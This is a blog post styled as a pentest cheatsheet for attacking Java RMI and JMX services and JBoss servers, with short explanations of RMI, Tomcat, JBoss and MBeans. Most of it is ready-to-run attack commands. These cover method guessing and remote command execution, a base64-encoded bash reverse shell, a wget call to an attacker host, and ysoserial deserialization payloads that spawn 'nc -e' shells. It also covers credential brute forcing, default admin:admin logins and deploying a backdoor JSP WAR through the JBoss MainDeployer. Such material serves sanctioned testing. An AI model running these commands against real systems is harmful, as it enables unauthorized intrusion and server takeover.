Java JMX RMI Pentest Cheatsheet


RMI can be run on any nonstandard port and when RMI is running you will observer one more endpoint port connected to it (find it from nmap easily by running rmi-dumpregistry )

#jmxrmi  bound name and its signatures might be vulnerable to MLetMbean Vuln, where MBean that can be used for loading additional MBeans over the network.
java.lang.String getVersion() newClient(java.lang.Object arg)
Java RMI Registry - Port 1616

nmap -Pn -sS -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1616
What is Java RMI?
The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. RMI provides for remote communication between programs written in the Java programming language.

When developers want to make their Java objects available within the network, they usually bind them to an RMI registry. The registry stores all information required to connect to the object (IP address, listening port, implemented class or interface and the ObjID value) and makes it available under a human readable name (the bound name). Clients that want to consume the RMI service ask the RMI registry for the corresponding bound name and the registry returns all required information to connect. Thus, the situation is basically the same as with an ordinary DNS service.

What is Apache Tomcat?
Apache Tomcat is a free and open-source implementation of the Jakarta Servlet, Jakarta Expression Language, and WebSocket technologies. It provides a "pure Java" HTTP web server environment in which Java code can run.

What is JBoss application server?
JBoss application server is an open-source platform, developed by Red Hat, used for implementing Java applications and a wide variety of other software applications. You can build and deploy Java services to be scaled to fit the size of your business.

What is JMX?
Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks. Those resources are represented by objects called MBeans (for Managed Bean).
Using the JMX console, we can manage the application and, therefore, alter it to execute malicious code on the target server and gain remote code execution.

What is an MBean?
An MBean is a managed Java object, similar to a JavaBeans component, that follows the design patterns set forth in the JMX specification. An MBean can represent a device, an application, or any resource that needs to be managed.

#Download the package from releases 

java -jar BaRMIe.jar -enum 5000
java -jar BaRMIe.jar -attack 5000
Remote Method Guesser  
java -jar rmg-3.0.0-jar-with-dependencies.jar 5000 enum

#Look for Vulnerabilities
java -jar rmg.jar enum 5000

#Get bound names/Brute Force & available method signatures
java -jar rmg.jar guess 1099
CustomRMIServer ] HIT! Method with signature String runCommand(Strin

#Exploiting the Available Method 
java -jar rmg.jar call 1099 --bound-name CustomRMIServer 'new String[] {"ls", "-al"}' --signature 'String runCommand(String[] args)'

# By Default, Remote Method Guesser does not display the function/command output, we need to use remote plugins to get the output
# Function name/ Bound name = CustomRMIServer; Followed by the signare found by guesser
# Let's use Time module and sleep command to find out if we are able to execute the commands or not
time java -jar rmg.jar call 1099 --bound-name CustomRMIServer 'new String[] {"sleep", "5"}' --signature 'String runCommand(String[] args)'

# If the Sleep is successful, then time for command execution using RMG plugins -GenericPrint.jar
java -jar rmg.jar call 1099 --bound-name CustomRMIServer 'new String[] {"ls", "-al"}' --signature 'String runCommand(String[] args)' --plugin plugins/GenericPrint.jar

# Gaining Reverse Shell 
echo '/bin/bash -c "bash -i >& /dev/tcp/ 0>&1"' | base64 -w0;echo
java -jar rmg.jar call 1099 'new String[] {"/bin/bash", "-c", "echo L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEwLjEvNDQzIDA+JjEiCg==| base64 -d | bash"}' --signature 'String runCommand(String[] args)' --bound-name CustomRMIServer --plugin plugins/GenericPrint.jar

#Command Exec - Example
java -jar rmg.jar call 5000 "wget Attacker_IP:8000/worked" --signature 'String execute(String cmd)' --bound-name jmxrmi

#Exploit CVE-2019-2684; Try to bind client locally; doesnt work for JMX RMI
java -jar rmg.jar bind 5000 my-object --localhost-bypass 
#Good for JMX Severs
Source - 

#Download package from repo

#Check for auth and possible attr
#If auth is enabled; cannot go further. 
java -jar beanshooter.jar info 5000

#Enum - Check for vulns (Auth and Pre-auth Deserialization)
java -jar beanshooter.jar enum 5000

#Bruteforce creds
java -jar beanshooter.jar brute 5000 --username-file /usr/share/wordlists/user.txt --password-file /usr/share/wordlists/pass.txt

#You might require ysoserial.jar, download and copy it to /opt/yso.jar or add an arg "--yso /opt/yso.jar"
java -jar beanshooter.jar serial 5000 CommonsCollections6 "nc 443 -e ash" --username admin --password admin

#Add --preauth if pre-auth deserialization is enabled
java -jar beanshooter.jar serial 5000 --preauth CommonsCollections6 "nc 443 -e ash"

#If SSL is enabled
java -jar beanshooter.jar enum --ssl 5000

#If Remote MBean server Does not require auth
#This might require tonka; you can find it in beanshooter repo; 

#Download the package

git clone 

java -jar rmiscout.jar bruteforce -i lists/methods.txt -r void,boolean,long -p String,int -l 1,4 <host> <port>

java -jar wordlist -i lists/prototypes.txt <host> <port>
Attacking JBOSS JMX Management  
default username/password is admin:admin 

- Under 'JMX Agent View'  page, you can search for any JBOSS API
- search for 'jboss.system*' to Search for the MainDeployer (JBoss System API).
- The MainDeployer service can be used to manage deployments on the JBoss application server. 
- Scroll down to the redeploy attribute. Make sure the redeploy attribute accepts a URL as the input (
- Use the backdoor JSP Payload from - 
- Create a war file using `jar -cvf cmd.war cmd.jsp`
- Set it on a python HTTP Server and make sure its accessible from JBOSS Server , we can invoke a war file from a url and install it 
- Under MainDeployer, Head over to the JMX Console page and under the redeploy attribute --> --> paste the cmd.war file url and hit "Deploy" 
- now head over to '' for GET command Execution 

Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment